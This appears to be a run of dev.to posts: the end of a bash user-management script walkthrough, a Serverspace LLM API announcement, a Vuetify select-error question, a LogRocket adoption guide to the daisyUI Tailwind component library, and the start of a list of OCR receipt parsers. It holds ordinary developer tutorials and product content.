- **Permissions Setting:** The script sets appropriate permissions for the user_passwords.txt file to ensure it is only accessible by authorized users. - **Completion Message:** Finally, the script displays a completion message and suggests checking the /var/log/user_management.log file for detailed information. **Script Breakdown** Here’s a detailed explanation of the script: _**Argument Check:**_ ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8k73dje1tm6r668epwqb.png) This code snippet checks if the number of arguments provided is not equal to 1. If so, it displays a usage message indicating the correct way to run the script and exits with a non-zero status code. **_User and Group Creation:_** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ehgfamcqkjoe0occ7ey9.png) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/419hjji2rqim3cyx55b0.png) This code snippet reads the text file line by line, where each line contains a username and a comma-separated list of groups. It performs the following actions: - Skips the line if the username is empty. - Checks if the user already exists. If so, it skips to the next line. - Checks if the group already exists. If not, it creates the group. - Assigns the user to existing groups. **_Password Generation and Storage:_** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9t0hro9zh4r9gunhiwp3.png) This code snippet generates a random password using the openssl rand command and sets it for the user. It securely stores the username and password in the /var/secure/user_passwords.txt file for future reference. **Conclusion** Automating user and group management in Linux systems can greatly simplify the process and save valuable time for sysops engineers. The provided bash script automates the creation of users and groups, assigns users to existing groups, generates secure passwords, and securely stores them. 
By leveraging automation, sysops engineers can focus on more critical tasks while ensuring efficient user and group management in their Linux systems.
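The password-generation step is shown only as screenshots in the original post. Below is a minimal standalone sketch of that step, assuming `openssl rand -base64` as the article describes; the username and the exact byte count are illustrative, not taken from the screenshots:

```shell
#!/bin/bash
# Sketch of the password step: generate a random password for one user
username="alice"   # hypothetical user for illustration

# 12 random bytes, base64-encoded, yield a 16-character password
password=$(openssl rand -base64 12)

echo "generated a ${#password}-character password for $username"
# In the full script this would be followed by setting the password
# and appending "$username,$password" to /var/secure/user_passwords.txt
```

Base64 encodes every 3 input bytes as 4 output characters, so 12 random bytes always produce a 16-character password with no padding.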
afolabi_harfoh
1,909,040
Access to Large Language Models via API from the Control panel!
We've launched a new service: now you can access large language models (LLM) via API directly from...
0
2024-07-02T14:21:38
https://dev.to/serverspace/access-to-large-language-models-via-api-from-the-control-panel-2de5
cloud, cloudcomputing, gpt, llm
We've launched a new service: now you can access large language models ([LLM](https://serverspace.us/services/serverspace-gpt-api/)) via API directly from your control panel. Multiple use cases:

- **Automate customer support:** get accurate answers to user queries.
- **Create content:** generate articles and promotional materials.
- **Translate languages:** translate texts and documents instantly.
- **Develop chatbots:** create smart virtual assistants to optimize business processes.

Together with our partner Ainergy, we offer you access to the Openchat-3.5-0106 model, which outperforms Grok-1 and ChatGPT (version 3.5 dated March 2023) on popular benchmarks. We plan to expand the model library in the future. Want to learn more? Read the [full press release](https://serverspace.us/about/news/new-access-to-llm-via-api-from-the-control-panel/) on our website! _[Serverspace](https://serverspace.us/) is an international cloud provider offering automatic deployment of virtual infrastructure based on Linux and Windows from anywhere in the world in less than 1 minute. For the integration of client services, open tools like API, CLI, and Terraform are available._
serverspace
1,909,034
Unhandled Error during execution of scheduler flush.
Windows 11 Microsoft Edge v126.0.2592.81 Vue3 3.4.27 I have two vuetify select components...
0
2024-07-02T14:18:36
https://dev.to/keyboardkowboy/unhandled-error-during-execution-of-scheduler-flush-9a
vue
Windows 11
Microsoft Edge v126.0.2592.81
Vue3 3.4.27

I have two vuetify select components interacting with each other with a method, like so:

```
<v-select
  v-model="selectCountry"
  :items="dataCountries"
  @update:modelValue="selectedCountry"
  item-title="title"
  item-value="value"
  label="Countries"
  density="compact"
/>

<v-select
  v-model="selectState"
  :items="dataStates"
  :hint="`${selectState.title}, ${selectState.value}`"
  item-title="title"
  item-value="value"
  label="States"
  density="compact"
/>

selectedCountry() {
  let states = BFHStatesList.filter(country => country[this.selectCountry]);
  this.dataStates = states;
  this.$emit('selectedCountry', this.selectCountry);
}
```

The first country select component operates accordingly. When I select a country option, and then try to select a state, it does not fill, and I receive this error:

> main.js:99 Invalid prop: type check failed for prop "title". Expected String | Number, got Object null
> at VListItem
> at VirtualScrollItem
> at VVirtualScroll
> at VListChildren
> at VList
> at VDefaultsProvider
> at BaseTransition
> at Transition
> at VDialogTransition
> at MaybeTransition
> at VOverlay
> at VMenu
> at VField
> at VInput
> at VTextField
> at VSelect
> at AdvanceServicesFilter
> at DefaultFilter
> at Services
> at RouterView
> at VLayout
> at App
>
> main.js:99 Unhandled error during execution of scheduler flush. This is likely a Vue internals bug. Please open an issue at https://github.com/vuejs/core . Proxy(Object) {…}
> at VListItemTitle
> at VListItem
> at VVirtualScrollItem
> at VVirtualScroll
> at VListChildren
> at VList
> at VDefaultsProvider
> at BaseTransition
> at Transition
> at VDialogTransition
> at MaybeTransition
> at VOverlay
> at VMenu
> at VField
> at VInput
> at VTextField
> at VSelect
> at AdvanceServicesFilter
> at DefaultFilter
> at <Services>
> at <RouterView>
> at <VLayout>
> at <App>
keyboardkowboy
1,908,031
daisyUI adoption guide: Overview, examples, and alternatives
Written by David Omotayo✏️ daisyUI is an open source component library built on top of Tailwind CSS....
0
2024-07-02T14:18:29
https://blog.logrocket.com/daisyui-adoption-guide
daisyui, webdev
**Written by [David Omotayo](https://blog.logrocket.com/author/davidomotayo/)✏️** daisyUI is an open source component library built on top of Tailwind CSS. It’s designed to enhance the development experience for web designers and developers. In this adoption guide, we’ll explore the origins of daisyUI, its purpose, and how it addresses common challenges faced by frontend developers. This information should help you judge whether daisyUI is the right tool for your next project. * * * ## What is daisyUI? daisyUI is a Tailwind CSS plugin that provides a collection of pre-designed components, semantic color classes, and typography enhancements. Unlike traditional UI libraries, daisyUI integrates seamlessly with Tailwind, so you can create customizable and visually appealing interfaces without sacrificing its utility-first approach. To understand the background of daisyUI and why it was created, let’s take a brief history on the background of the library it’s built on (Tailwind) and the need to build a component library around it. ### The rise of Tailwind CSS and a new challenge Before Tailwind CSS, developers relied on traditional libraries like Bootstrap and YUI to speed up website and web application styling during development. However, these libraries offered default styles that were difficult to override and customize. As a result, many websites built with these tools ended up looking similar, lacking uniqueness and brand identity. This lack of flexibility encouraged developers to seek alternatives that provided more granular control over website appearance. For this reason, Tailwind CSS was created as a utility-first library with predefined classes that lets developers design websites directly in their markup. Tailwind’s flexibility and granular control addressed the limitations of traditional libraries, but a new challenge arose: bloated markups. 
While Tailwind gave developers the flexibility to create custom designs, the use of utility classes sometimes led to lengthy and repetitive markup. Styling even simple elements required multiple class names, resulting in larger HTML files. Developers needed a way to balance customization with maintainability. ### daisyUI: A response to bloated markups Pouya Saadeghi, a software engineer from Turkey, created daisyUI with the goal of balancing two common developer concerns: maintainability and customizability. Tailwind CSS offered improved customizability over traditional UI libraries, but had limited reusability and generated excessive code, which made maintaining projects challenging. Pouya was able to use Tailwind’s `@apply` directives a couple of times to combine multiple utility classes into a single class. The result was similar to how Bootstrap or other libraries work, but with the flexibility of Tailwind. So, Pouya decided to create a collection of these directives to reuse in future projects. Using his collection of `@apply` directives on a couple of personal projects showed Pouya how great and efficient it was. He decided to package his collection of `@apply` directives alongside pre-designed components to create a component library that combined the best of both worlds: the efficiency of utility classes and the reusability of components. And thus, daisyUI was born. #### _Further reading:_ * [daisyUI: Tailwind CSS components for reducing markup](https://blog.logrocket.com/daisyui-tailwind-components-react-apps/) * [Building reusable React components using Tailwind CSS](https://blog.logrocket.com/building-reusable-react-components-using-tailwind-css/) * * * ## How does daisyUI work? At its core, daisyUI leverages Tailwind’s `@apply` directives to combine basic utility classes for specific webpage elements into a single class. 
For example, to style a button element, daisyUI combines utility classes for padding, background color, text color, and other properties into a `btn` class:

```css
.btn {
  @apply py-2 px-5 bg-violet-500 text-white font-semibold rounded-full shadow-md hover:bg-violet-700 focus:outline-none focus:ring focus:ring-violet-400 focus:ring-opacity-75;
}
```

Assigning this class to a button element applies all the specified styles, with the flexibility to easily override default styles while maintaining consistency across your projects.

daisyUI uses this foundation to offer a collection of pre-designed components that can be easily customized and integrated into any project using Tailwind CSS. This further improves DX and ensures consistency across different parts of the application. We'll learn more about these components later in this guide.

* * *

## Why use daisyUI?

Adopting daisyUI as a frontend developer is a no-brainer, considering how significantly it improves DX. This is particularly advantageous if you're already familiar with UI component libraries and styling with Tailwind utility classes.

But let's cut through the hype – every UI library in the frontend scene seems like an obvious choice. So, how do you decide if daisyUI is the right fit for you? The answer lies in weighing its pros and cons, focusing on factors crucial for project success in both the short term and the long term.

There are countless reasons why daisyUI stands out among the pack, but here are a few I think make daisyUI a compelling choice:

* **Performance**: daisyUI is designed to be lightweight and efficient. It leverages Tailwind utility classes, which are optimized for performance.
While daisyUI provides pre-designed components, these components are not included by default, which ensures users only include the components essential to their specific needs
* **Ease of use**: daisyUI uses a developer-friendly syntax that streamlines the creation of complex UI components without the need for custom CSS. Additionally, it offers pre-built components that save development time. Since all of this is layered on Tailwind, the transition is seamless for anyone already familiar with Tailwind CSS
* **Learning curve**: The learning curve for daisyUI is relatively shallow. Its consistent class naming conventions and comprehensive documentation make it accessible for developers of varying skill levels
* **Customization**: Unlike traditional component libraries (e.g., Bootstrap), daisyUI components are highly customizable. You can adjust their appearance by adding or modifying utility classes
* **Bundle size**: daisyUI uses pre-built styles, which might make your project files slightly larger compared to using raw Tailwind CSS. However, given Tailwind's minimal footprint, the overhead isn't significant as long as you avoid adding unnecessary styles and components. Fortunately, if your project files do become too large, daisyUI offers the option to purge unused styles to reduce their size
* **Community & ecosystem**: daisyUI is a relatively new library, but its user base has grown impressively. The library has amassed over 30k GitHub stars and boasts a community of active and supportive developers who regularly contribute by sharing tips, components, and best practices in forums
* **Integration**: daisyUI is framework-agnostic, meaning it integrates well with other frontend libraries or frameworks. Whether you're using React, Vue, or plain HTML/CSS, you can plug in daisyUI effortlessly
* **Documentation**: daisyUI offers comprehensive documentation.
You'll find clear examples, usage guidelines, and explanations for each component, ensuring a smooth DX

While daisyUI offers undeniable advantages in terms of developer experience, it's not a one-size-fits-all solution and comes with its own set of drawbacks. Here are some of daisyUI's cons you should be aware of before adopting it:

* **Potential for bloat**: Because daisyUI uses a lot of directives under the hood, it can bloat your project's file size, particularly when you include too many large or unnecessary components
* **Learning curve**: If you're new to Tailwind CSS, understanding both utility classes and daisyUI components might be overwhelming initially
* **JavaScript overhead**: Some daisyUI components rely on JavaScript for interactivity (e.g., dropdowns, modals, etc.). Integrating JavaScript libraries or writing custom scripts to handle these interactions adds overhead to your project. While this isn't unique to daisyUI (many UI libraries have similar requirements), it's essential to be aware of the trade-off between convenience and added complexity

By weighing these factors and their benefits, you can make an informed decision about whether daisyUI is the right fit for your project.

#### _Further reading:_

* [Exploring Catalyst, Tailwind's UI kit for React](https://blog.logrocket.com/exploring-catalyst-tailwind-ui-kit-react/)
* [Mojo CSS vs. Tailwind: Choosing the best CSS framework](https://blog.logrocket.com/mojo-css-vs-tailwind-choosing-best-css-framework/)
* [11 best Tailwind CSS component and template collections](https://blog.logrocket.com/best-tailwind-css-component-template-collections/)

* * *

## Getting started with daisyUI

daisyUI offers two fairly straightforward methods for setting it up in your projects. You can either set it up as a Node package using popular package managers like npm, pnpm, yarn, and bun, or opt to use a CDN. There are a few things to note based on the method you choose to set up daisyUI in your project.
We'll go over them in a bit. For now, let's look at how you can use these methods to integrate daisyUI into your projects.

### Installing daisyUI as a Node package

To install daisyUI as a Node package, you need to fulfill the following prerequisites:

* Install Node.js on your machine
* [Install Tailwind CSS in your project](https://blog.logrocket.com/how-to-use-tailwind-css-react-vue-js/)

Once you have completed these prerequisites, you can proceed to run the following command in your project's directory:

```bash
npm i -D daisyui@latest
```

If you're not using npm, you can replace `npm` with your [preferred package manager](https://blog.logrocket.com/javascript-package-managers-compared/).

After the installation is complete, navigate to the `tailwind.config.js` file in your project's directory and make the following updates:

```javascript
module.exports = {
  //...
  plugins: [require('daisyui')],
}
```

This will add daisyUI as a plugin to your project's Tailwind package. With that, you can start using daisyUI classes and components in your project.

### Installing daisyUI using a CDN

To set up daisyUI using a CDN, simply copy the `link` and `script` tags below and paste them into the head section of your HTML file:

```html
<link href="https://cdn.jsdelivr.net/npm/daisyui@4.10.5/dist/full.min.css" rel="stylesheet" type="text/css" />
<script src="https://cdn.tailwindcss.com"></script>
```

That's all you have to do to install Tailwind and integrate daisyUI into your project via a CDN.

* * *

## Using daisyUI as a Tailwind plugin vs. with a CDN

As you may have noticed earlier, when we installed daisyUI as a Node package, we included it as a plugin. However, with the CDN method, daisyUI is automatically included. This is just one of the key differences between these two installation methods.
Let's explore some other differences between using daisyUI as a Tailwind plugin and using a CDN:

* **Installation**: When using daisyUI as a plugin, you install it directly into your project and register it as a plugin in your Tailwind CSS configuration file. In contrast, you don't need to install anything locally when using a CDN: you rely on the hosted version
* **Tree shaking**: If your build process supports tree shaking, using daisyUI as a plugin allows you to include only the styles your application actually uses. This is not possible when using a CDN
* **Simplicity**: Using a CDN is straightforward. You include a link to the daisyUI CSS file in your HTML, and you're ready to use its classes and components. In contrast, the plugin approach involves more installation steps for your projects
* **Network dependency**: When using a CDN, your application relies on an external server to fetch the daisyUI styles. If the CDN is slow or unavailable, it affects your app's performance. In contrast, with the plugin approach, daisyUI is part of your project, so it works offline once installed
* **Customization**: While you can still customize some aspects using utility classes when using a CDN, you won't have the same level of control as with the plugin approach

Both methods have their advantages, but using daisyUI as a plugin is more beneficial overall. The most significant advantage is the ability to purge unused styles, which the plugin approach offers but the CDN method doesn't. That's why the documentation recommends using the CDN method only for development, to avoid excessively large file sizes in production.

* * *

## Key daisyUI features to know

As I've already emphasized multiple times in this guide, daisyUI offers a wide range of customizable prebuilt components. However, the library offers a lot more than that. Let's look at some of the standout features that you should pay attention to when working with daisyUI.
### Prebuilt components

daisyUI offers a variety of ready-made components that are essential to its feature set. These components cover a wide range of categories, from simple action components to complex data display, layout, data input, and mockup components that are essential in everyday use.

The documentation is comprehensive enough to give you in-depth knowledge about these components. However, to get a sense of their categories and functionalities, let's explore some of the component categories and the components they include.

#### Actions

The action category contains a collection of simple components that facilitate user interactions and trigger specific behaviors. These include the `button`, `modal`, `dropdown`, `swap`, and `theme controller` components.

The structures of these components are simple enough that they can be created by simply adding daisyUI utility classes to element declarations instead of copying them from the documentation. Take the `button` component, for instance. At the base level, it's styled with just the `btn` utility class.
Instead of going back and forth to the documentation, you can simply declare a `button` element and assign the required utility class:

```html
<button className="btn">Button</button>
```

To create different variants of the button component, you can assign any of the following utility classes:

```html
<button className="btn btn-active">Default</button>
<button className="btn btn-active btn-neutral">Neutral</button>
<button className="btn btn-active btn-primary">Primary</button>
<button className="btn btn-active btn-secondary">Secondary</button>
<button className="btn btn-active btn-accent">Accent</button>
<button className="btn btn-active btn-ghost">Ghost</button>
<button className="btn btn-active btn-link">Link</button>
```

Here's how each button class looks:

![Examples Of Various Available Daisy Ui Button Classes](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-button-classes.png)

Every other component included in the action category follows this simple structure, except for the `modal` component. Due to its slightly more complex functionality, the modal component requires a significant amount of boilerplate code and a small amount of JavaScript:

```html
<button className="btn" onClick={()=>document.getElementById('my_modal_1').showModal()}>Hello daisyUI</button>
<dialog id="my_modal_1" className="modal">
  <div className="modal-box">
    <h3 className="font-bold text-lg">Hello!</h3>
    <p className="py-4">Press ESC key or click the button below to close</p>
    <div className="modal-action">
      <form method="dialog">
        {/* if there is a button in form, it will close the modal */}
        <button className="btn">Close</button>
      </form>
    </div>
  </div>
</dialog>
```

Check out how opening and closing the modal looks:

![Opening And Closing A Simple Daisy Ui Modal](https://blog.logrocket.com/wp-content/uploads/2024/06/Opening-closing-modal-daisyUI.gif)

You might want to build on the markup provided in the documentation to save yourself the trouble and time.
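Since daisyUI modals are plain `<dialog>` elements, you can also drive them with the native `showModal()`/`close()` API instead of inline handlers. Here's a minimal sketch of a reusable helper — the element ID is an assumption carried over from the markup above:

```javascript
// Minimal helper for daisyUI modals, which are native <dialog> elements.
// Returns the action taken so calling code (or tests) can observe the behavior.
function toggleModal(dialog, open) {
  if (open) {
    dialog.showModal(); // native <dialog> API: opens the element as a modal with a backdrop
    return "opened";
  }
  dialog.close(); // closes the dialog; ESC and method="dialog" forms trigger this too
  return "closed";
}

// Browser usage (assumes the #my_modal_1 markup from the example above):
// const dialog = document.getElementById("my_modal_1");
// toggleModal(dialog, true);  // open
// toggleModal(dialog, false); // close
```

Keeping the helper a pure function of the dialog element makes it easy to reuse across several modals on the same page.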
#### Data display

The data display category contains a collection of components that present information to users. This category comprises a large portion of daisyUI's components. Most of the components in this category are used to craft data-intensive interfaces, which would otherwise be difficult and time-consuming to build from scratch.

Some of these components include tables, cards, accordions, countdowns, carousels, and stats. Let's see examples of each.

The `Table` component is used to display tabular data in rows and columns:

![Example Daisy Ui Table Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-table-component.png)

The `Card` component acts as a container for displaying summarized content (e.g., product cards, user profiles):

![Example Daisy Ui Card Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-card-component.png)

The `Accordion` component is used to show and hide content, with only one item expandable at a time:

![Example Daisy Ui Accordion Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-accordion-component.gif)

The `Countdown` component lets you set a custom countdown with a transition effect on the changing numbers:

![Example Daisy Ui Countdown Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-countdown-component.gif)

The `Carousel` component lets you easily create a carousel of images in a scrollable area:

![Example Daisy Ui Carousel Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-carousel-component.gif)

The `Stat` component is used to display statistical data:

![Example Daisy Ui Stat Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-stat-component.png)

For more information about the components in the data display category and others, I recommend checking out [daisyUI's
documentation](https://react.daisyui.com/?path=/story/data-display-accordion--default).

#### Feedback

The feedback category contains a collection of components that provide information about the system's status or the outcome of a user's action. Some of the feedback components include alerts, loading, skeleton, and tooltips. Let's see examples of these as well.

The `Alert` component is used to alert users about important events:

![Example Daisy Ui Alert Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-alert-component.png)

The `Loading` component is used to render an animation to indicate a loading state:

![Example Daisy Ui Loading Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-loading-component.gif)

The `Skeleton` component serves a similar purpose to the `Loading` component, but it previews the shape of the loading content instead of showing a loading circle:

![Example Daisy Ui Skeleton Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-skeleton-component.gif)

The `Tooltip` component is used to display information about an element when hovering over it:

![Example Daisy Ui Tooltip Component — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-tooltip-component.gif)

These are but a handful of the prebuilt components that daisyUI offers. [Refer to the documentation](https://react.daisyui.com/?path=/docs/welcome--docs) to explore and learn more about the available components.

### Custom components

In the previous section, we discussed how variants help customize elements. While they offer flexibility, they come with preset styles. Luckily, daisyUI offers multiple ways to customize components to match your design system. The most straightforward and intuitive method is using Tailwind utility classes.
Suppose you want to customize the `button` component from earlier without using any of the preset variations provided by daisyUI. You can do so with Tailwind utility classes as follows:

```html
<button class="btn rounded-full px-16">Two</button>
```

Another way would be to use the `@apply` directive to create your own styling rules. Here's the same style using the `@apply` directive:

```css
.custom-btn {
  @apply btn rounded-full px-16;
}
```

Additionally, you can opt for the [unstyled version of daisyUI and tailor it to your preference](https://daisyui.com/docs/customize/) or design your own theme.

### Colors

daisyUI provides a collection of semantic color utility classes that it encourages you to use instead of Tailwind's color shades. These classes have names with specific meanings that make them more intuitive for designers and developers. Examples of daisyUI semantic color names include:

* **Primary**: Your main brand color
* **Secondary**: A complementary color
* **Accent**: A color used for highlighting
* **Success**, **Warning**, **Error**, and **Info**: State-specific colors
* **Neutral**: Background, text, and border colors

Why should you use daisyUI's semantic color names? Here are a few reasons:

* Traditionally, when designing user interfaces, we don't randomly choose colors. Instead, we define a specific color palette with meaningful names, such as `primary` and `secondary`. So it makes sense to use the descriptive color names provided by daisyUI to simplify our work
* Semantic color names make theming easier. You can create multiple themes using just a few lines of CSS variables
* Unlike Tailwind, which provides every shade of every color, daisyUI offers a limited set of semantic color names. This keeps your project cleaner and more consistent

### Themes

daisyUI's out-of-the-box theming capability is one of the features I find pretty exciting.
Beyond offering the ability to change your app's color state from light to dark mode, daisyUI also provides the option to properly theme your application using various color themes, which apply to all your elements with no extra effort:

![Gif Demonstrating Daisy Ui Theming Capabilities With Theme Dashboard Cycling Through Various Preset Themes](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-theming-capabilities.gif)

daisyUI takes the phrase “with zero effort” quite literally when it comes to theming. Adding a theme to your application is as simple as adding its name to the `themes` array in `tailwind.config.js` as follows:

```javascript
module.exports = {
  //...
  daisyui: {
    themes: ["light", "dark", "dracula"],
  },
}
```

You can then activate it by adding a `data-theme` attribute with your preferred theme name to the HTML tag:

```html
<html data-theme="dracula"></html>
```

The best part is that you can add multiple themes and use a utility tool like `theme-change` (made by the creator of daisyUI) to switch themes and save the selected theme in local storage.

Here are some of daisyUI's themes:

![Ten Example Prebuilt Daisy Ui Themes](https://blog.logrocket.com/wp-content/uploads/2024/06/Prebuilt-daisyUI-themes.png)

Note that I included a screenshot from the docs to give you a visual representation of the themes. [Refer directly to the documentation](https://daisyui.com/docs/themes/) to see the complete list of available themes.

### Layout & typography

daisyUI approaches layout and typography features differently. For layouts, it relies on Tailwind's default utility classes, while for typography, it uses the `@tailwindcss/typography` plugin to tackle common challenges faced by developers when designing web interfaces. The most prevalent of these issues is unexpected typography behavior, which stems from the removal of the user agent's default styles, or resets.
It's generally advised to reset or remove these styles before starting UI development to avoid future problems. Tailwind does this by default, and as a result, styles applied to content from external sources, such as text editors in a CMS or Markdown files, tend to appear differently than anticipated.

The `@tailwindcss/typography` plugin fixes this issue by providing a set of `prose` classes that enhance typography for content you don't directly control. You can apply these `prose` classes to your HTML content to add beautiful typography defaults, ensuring consistent styling even for content you didn't create directly:

```html
<article class="prose">
  <!-- Your content here -->
</article>
```

Additionally, daisyUI adds some styles to `@tailwindcss/typography` so it can tailor the typography to the current theme. This way, your typography stays consistent across the board:

![Example Daisy Ui Typography Styles — Screenshot From Docs](https://blog.logrocket.com/wp-content/uploads/2024/06/daisyUI-typography.png)

To use `@tailwindcss/typography` in your project, require it in your `tailwind.config.js` file like so:

```javascript
module.exports = {
  //...
  plugins: [require("@tailwindcss/typography"), require("daisyui")],
};
```

* * *

## Use cases for daisyUI

Given daisyUI's framework-agnostic nature, it can be used for a wide range of practical and business purposes. Here is a list of some of the use cases for daisyUI:

* **Ecommerce platforms**: daisyUI's prebuilt components like `Card`, `Button`, and `Form` make it easy to create engaging shopping experiences. They can be easily customized to reflect a unique brand identity, all while ensuring consistent design
* **SaaS apps**: daisyUI offers a variety of reusable components for building UIs across different functions.
You can deliver features quickly and iterate on design improvements for important interfaces like dashboards, user settings, and data visualization in SaaS platforms
* **Content management systems (CMS)**: daisyUI's utility-first approach lets teams prioritize performance even with limited resources, which is crucial when building a CMS. You can focus on core functionality and business logic instead of spending time styling components and compromising efficiency
* **Admin panels**: daisyUI can improve your efficiency when building robust and maintainable admin interfaces by providing ready-made components for common admin panel elements like tables, forms, and buttons

Keep in mind that this is just an example list. daisyUI offers a seamless DX, attractive design, and high performance for anything from basic websites to complex business applications.

#### _Further reading:_

* [Building a Next.js app using Tailwind and Storybook](https://blog.logrocket.com/building-next-js-app-tailwind-storybook/)
* [10 best Tailwind CSS component libraries](https://blog.logrocket.com/10-best-tailwind-css-component-libraries/)
* [A guide to adding gradients with Tailwind CSS](https://blog.logrocket.com/guide-adding-gradients-tailwind-css/)
* [Styling in React: 5 ways to style React apps](https://blog.logrocket.com/styling-react-5-ways-style-react-apps/)

* * *

## daisyUI vs. similar libraries

There are many UI libraries in the frontend ecosystem, each claiming to be the ultimate solution to common developer pain points. Many of these libraries offer similar advantages to daisyUI, so choosing between them can be a chore. The key is identifying the library that best aligns with your project's specific needs and your development team's skill sets.
To help you with that, we've prepared a table comparing daisyUI to some of its leading competitors in the frontend ecosystem:

<table>
  <thead>
    <tr>
      <th>Feature</th>
      <th>daisyUI</th>
      <th>MUI</th>
      <th>Bootstrap</th>
      <th>Shadcn UI</th>
      <th>Chakra UI</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Supported frameworks</td>
      <td>Framework-agnostic</td>
      <td>React</td>
      <td>Vanilla JS, React, Vue.js</td>
      <td>Framework-agnostic</td>
      <td>React</td>
    </tr>
    <tr>
      <td>Community</td>
      <td>Growing community, good documentation</td>
      <td>Large, active community</td>
      <td>Very large community</td>
      <td>Smaller community</td>
      <td>Moderate, active community</td>
    </tr>
    <tr>
      <td>Bundle size</td>
      <td>39.5kB minified</td>
      <td>93.7kB minified</td>
      <td>38.7kB minified</td>
      <td>35.3kB minified</td>
      <td>205.9kB minified</td>
    </tr>
    <tr>
      <td>Prestyled components</td>
      <td>Yes</td>
      <td>Yes</td>
      <td>Yes</td>
      <td>Yes</td>
      <td>Yes</td>
    </tr>
    <tr>
      <td>Customization options</td>
      <td>Extensive, through Tailwind CSS</td>
      <td>Moderate</td>
      <td>Moderate</td>
      <td>Extensive, through theming</td>
      <td>Extensive</td>
    </tr>
    <tr>
      <td>Scalability</td>
      <td>Scales well</td>
      <td>Scales well</td>
      <td>Scales well</td>
      <td>Scales well</td>
      <td>Scales well</td>
    </tr>
    <tr>
      <td>Learning curve</td>
      <td>Moderate (if familiar with Tailwind)</td>
      <td>Steeper</td>
      <td>Moderate</td>
      <td>Moderate (if familiar with Tailwind)</td>
      <td>Moderate</td>
    </tr>
    <tr>
      <td>Theming</td>
      <td>Extensive theming capabilities and options</td>
      <td>Extensive theming capabilities</td>
      <td>Extensive theming capabilities</td>
      <td>Advanced theming capabilities</td>
      <td>Extensive theming capabilities</td>
    </tr>
  </tbody>
</table>

You can use this table to compare daisyUI at a glance to other libraries in terms of important aspects such as versatility, bundle size, feature set, and community support.

* * *

## Conclusion

daisyUI bridges the gap between utility-first styling and component reusability.
Due to its seamless integration with Tailwind CSS, it gives developers the flexibility to create efficient, customizable, and visually appealing interfaces. Whether you're building a simple website, a complex application, or anything in between, daisyUI offers a valuable toolkit for frontend development.

---

## Get set up with LogRocket's modern error tracking in minutes:

1. Visit [https://logrocket.com/signup/](https://logrocket.com/signup/) to get an app ID.
2. Install LogRocket via npm or script tag. `LogRocket.init()` must be called client-side, not server-side.

   Via npm:

   ```bash
   npm i --save logrocket
   ```

   Then initialize it in your code:

   ```javascript
   import LogRocket from 'logrocket';
   LogRocket.init('app/id');
   ```

   Via script tag, add the following to your HTML:

   ```html
   <script src="https://cdn.lr-ingest.com/LogRocket.min.js"></script>
   <script>window.LogRocket && window.LogRocket.init('app/id');</script>
   ```

3. (Optional) Install plugins for deeper integrations with your stack:
   * Redux middleware
   * ngrx middleware
   * Vuex plugin

[Get started now](https://lp.logrocket.com/blg/signup)
---

# Top Free OCR Receipt Parser APIs, and Open Source models
*Published 2024-07-02 at [edenai.co](https://www.edenai.co/post/top-free-ocr-receipt-parser-apis-and-open-source-models) · Tags: ai, api, opensource*
## What is a [Receipt Parser API](https://www.edenai.co/feature/ocr-receipt-parsing-apis?referral=top-free-receipt-parser-apis-and-open-source-models)?

[Receipt Parser](https://www.edenai.co/feature/ocr-receipt-parsing-apis?referral=top-free-receipt-parser-apis-and-open-source-models) is a technology that extracts and digitizes meaningful data from scanned or PDF receipts using OCR (Optical Character Recognition). It automates the process of scanning receipts and extracting information, allowing businesses to collect data faster and more efficiently compared to manual data entry. Common fields captured by receipt OCR include item descriptions, quantities, prices, merchant information, dates, and total amounts.

![Receipt Parsing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uhgkh43hdhllzkxoali2.png)

By automating the extraction of data from receipts, companies can streamline their workflows, reduce errors, and gain valuable insights into their spending and purchasing habits.

## Top Open Source (Free) Receipt Parser models on the market

For users seeking a cost-effective engine, opting for an open-source model is recommended. Here is a list of the best open source Receipt Parser models:

### [Tesseract OCR](https://github.com/tesseract-ocr/tesseract?referral=top-free-receipt-parser-apis-and-open-source-models)

Tesseract is a highly versatile open-source OCR engine that can be adapted for receipt data extraction. With the right training and configuration, it can serve as a powerful tool for developers looking to build their own receipt parser solutions.

Tesseract includes a neural net (LSTM) based OCR engine, which improves its performance on line recognition. It also supports legacy modes for compatibility and performance tuning. Tesseract's ability to be trained with additional data makes it highly adaptable for specialized tasks like receipt parsing.
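Keep in mind that Tesseract (like any OCR engine) only produces raw text; turning that text into structured receipt fields is a separate parsing step you write yourself. The sketch below illustrates what such post-processing might look like — the field names and regular expressions are illustrative assumptions, not part of Tesseract:

```javascript
// Hypothetical post-processing for raw OCR output from Tesseract (or any engine).
// The patterns below are deliberately simplistic; real-world receipts vary widely
// in layout, currency symbols, and date formats.
function parseReceiptText(rawText) {
  // Look for a line like "TOTAL: $42.50" (case-insensitive).
  const totalMatch = rawText.match(/total\s*[:\s]\s*\$?(\d+(?:\.\d{2})?)/i);
  // Look for a US-style date like "06/15/2024".
  const dateMatch = rawText.match(/(\d{2}\/\d{2}\/\d{4})/);
  return {
    total: totalMatch ? Number(totalMatch[1]) : null,
    date: dateMatch ? dateMatch[1] : null,
  };
}

// Example with OCR-like text:
// parseReceiptText("ACME STORE\n06/15/2024\nTOTAL: $42.50")
//   → { total: 42.5, date: "06/15/2024" }
```

This regex approach is where hosted receipt-parser APIs earn their keep: they replace hand-maintained patterns with models trained on many receipt layouts.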
### [Apache Tika](https://github.com/apache/tika?referral=top-free-receipt-parser-apis-and-open-source-models)

